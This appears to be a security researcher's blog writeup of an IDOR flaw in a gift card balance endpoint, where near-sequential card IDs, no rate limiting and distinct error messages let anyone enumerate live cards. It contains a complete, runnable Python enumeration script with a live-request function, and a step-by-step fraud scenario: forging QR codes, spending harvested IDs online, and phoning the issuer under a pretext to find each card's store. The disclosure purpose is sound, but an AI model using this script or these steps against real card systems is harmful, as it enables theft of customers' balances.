$20,000+ in Leaked Gift Cards – IDOR Writeup

Jacob Masse
Feb 1, 2025


Introduction

Over the holidays, I received a gift card to a local sushi place as a present. A few weeks later, I went out for sushi with some friends and noticed something odd about how the card was redeemed: our waitress took the card and scanned a QR code printed on the back to apply it to the bill. After I got home, I scanned the QR code myself to see where it led. That is where this started.

The Setup

Each gift card number is 17 digits long and split into three sections. The sections may encode different things or vary by region or store, but I have not confirmed this yet. The issuing company supplies gift cards (open and closed loop) to a range of restaurants and online shops, and its cards are compatible with almost every POS system.

That gives this vulnerability a large attack surface: many merchants, and many of their customers, may be affected.

The Exploit

When the QR code is scanned on the back of the gift card, it leads to a URL something like this:

https://example.com/checkcardbalanceonipad?acctID=XXXXXXXXXXXXXXXXX

Remember that this is the ONLY way funds are deducted from the card. There is no PIN or secondary authentication. Any merchant can scan the QR code at their own store, or sometimes at other stores (open-loop cards), and deduct funds from the card towards a purchase.

On further investigation I found no rate limiting and no WAF protecting this critical endpoint, and, worst of all, the gift card account IDs are near-sequential :(

When you request the balance for an ID through the endpoint, one of two things happens:

  • Valid cards: the balance is shown (ex: “Gift: $50”)
  • Invalid cards: an error message is displayed (ex: “No Balance Available for this Account”)

Because the two responses are easy to tell apart, the endpoint doubles as an oracle for which IDs are live.

The Script + Results

Combining the two distinguishable responses with the near-sequential IDs and the lack of rate limiting, a simple Python script can query the endpoint and reveal every active customer gift card in a range.

The script works like this:

  • Using the requests library, the script queries https://example.com/checkcardbalanceonipad?acctID={bruteForceGiftCardID}
  • bruteForceGiftCardID iterates over a range of candidate gift card numbers. It starts at the beginning of my own card's number range (which I know is a valid range) and increments by one per request. One could start earlier and find more cards than I did, but I am only after a proof of concept.
  • For each response, the script checks the page content for a dollar sign (a valid card) or the “No Balance Available for this Account” message (an invalid card).
  • Valid gift card codes are printed.
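The sweep described in the steps above, written out as an added Python example; this is not the author's script. The host in BALANCE_URL is the placeholder from the post, the endpoint is replaced by a constructed in-memory mock (MOCK_CARDS) so the block runs offline, and the ID values are made up. The classifier tests for the invalid-card message before looking for a dollar sign, since a stray “$” in the page template would otherwise count as a hit.

```python
import re
from typing import Callable, Iterator, List, Optional, Tuple

# Placeholder URL pattern from the post; the real host is not disclosed.
BALANCE_URL = "https://example.com/checkcardbalanceonipad?acctID={acct_id}"
INVALID_MARKER = "No Balance Available for this Account"
# Matches "$50", "$50.00" or "$1,000.00"; consulted only after the
# invalid-card marker has been ruled out.
BALANCE_RE = re.compile(r"\$\s?(\d[\d,]*(?:\.\d{2})?)")


def classify(html: str) -> Optional[float]:
    """Return the balance of a valid card, or None for an invalid/unknown ID.

    The invalid marker is tested first so that a "$" elsewhere in the page
    template cannot produce a false positive.
    """
    if INVALID_MARKER in html:
        return None
    m = BALANCE_RE.search(html)
    return float(m.group(1).replace(",", "")) if m else None


def enumerate_cards(start: int, count: int,
                    fetch: Callable[[str], str],
                    digits: int = 17) -> Iterator[Tuple[str, float]]:
    """Walk `count` consecutive IDs from `start`, yielding (acct_id, balance) hits.

    Incrementing by one is what makes the attack cheap: with near-sequential
    IDs and no rate limiting, every request has a real chance of hitting a
    live card.
    """
    for n in range(start, start + count):
        acct_id = str(n).zfill(digits)  # keep the 17-digit, zero-padded form
        balance = classify(fetch(BALANCE_URL.format(acct_id=acct_id)))
        if balance is not None:
            yield acct_id, balance


def sweep(start: int, count: int,
          fetch: Callable[[str], str]) -> Tuple[List[Tuple[str, float]], float]:
    """Collect every hit in a range plus the total dollar value exposed."""
    found = list(enumerate_cards(start, count, fetch))
    return found, sum(b for _, b in found)


def live_fetch(url: str) -> str:
    """Transport for a real run (requests, as in the post). Imported lazily so
    the offline mock run below needs no third-party package."""
    import requests
    return requests.get(url, timeout=10).text


# Constructed mock of the endpoint (hypothetical IDs): three "issued" cards
# inside a block of 20 consecutive numbers; any other ID gets the error page.
MOCK_CARDS = {
    "12345678901234567": "<p>Gift: $50</p>",
    "12345678901234570": "<p>Gift: $25.00</p>",
    "12345678901234575": "<p>Gift: $1,000.00</p>",
}


def mock_fetch(url: str) -> str:
    acct_id = url.rsplit("acctID=", 1)[1]
    return MOCK_CARDS.get(acct_id, f"<p>{INVALID_MARKER}</p>")


if __name__ == "__main__":
    hits, total = sweep(12345678901234560, 20, mock_fetch)
    for acct_id, balance in hits:
        print(f"{acct_id}: ${balance:,.2f}")
    print(f"{len(hits)} valid cards, ${total:,.2f} exposed")
```

Swap `mock_fetch` for `live_fetch` to run it against a real endpoint; the sweep itself is transport-agnostic. Note that the loop deliberately has no delay or backoff, which is exactly the behaviour the missing rate limit fails to punish.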

After running the script for only 30 minutes, I found over $20,000 worth of valid gift cards belonging to over 300 customers. Keep in mind that this came from a single ID range, and I started halfway through it. More cards remain in the other ranges, and in the part of my range I never checked.

Potential Attack Scenario

Since a QR code carrying only the gift card ID (acctID) is enough to make a transaction with no further authorization, an attacker could craft a QR code containing any gift card ID discovered by the script and use it in stores or restaurants to pay. The unsuspecting customers would later find their balances empty with no explanation. Online orders are even easier: no QR code is needed, just enter the ID found by the script at checkout.

If an attacker wanted to know which store a gift card was for, they could call the gift card company posing as a customer who found some old gift cards in storage and wants to know the balance and where they can be used. The company would likely oblige, since the account ID is the only form of authentication ever used. If you have the ID, you own the gift card.

Moving Forward

I contacted the company to ask where I could report a critical security vulnerability, as they have no bug bounty program or VDP.

I am waiting for an answer from them, and I will update this article on their resolution once I submit my report :)

Written by Jacob Masse

Developer | Pentester | Director of Operations @ TrazTech Solutions LLC https://www.linkedin.com/in/jacob-masse-836371226/
